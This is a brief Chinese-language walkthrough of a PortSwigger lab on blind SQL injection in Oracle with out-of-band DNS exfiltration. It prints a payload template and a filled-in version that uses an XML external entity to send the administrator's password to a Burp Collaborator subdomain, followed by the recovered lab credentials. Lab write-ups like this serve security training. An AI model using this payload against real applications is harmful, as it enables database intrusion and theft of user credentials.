burpsuite靶场----SQL注入17----oracle之DNS外带
burpsuite靶场----SQL注入17----oracle之DNS外带
靶场地址
https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band-data-exfiltration
正式开始
payload模板:'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
1.获取到burpsuite默认的dns
2.将BURP-COLLABORATOR-SUBDOMAIN替换为自己获得的subdomain
'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.86cqq9vs9yhbsyygo7t4lmjvqmwck1.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual--
3.成功
获取账号密码
administrator tiyq3pay84ugnxx5f5ig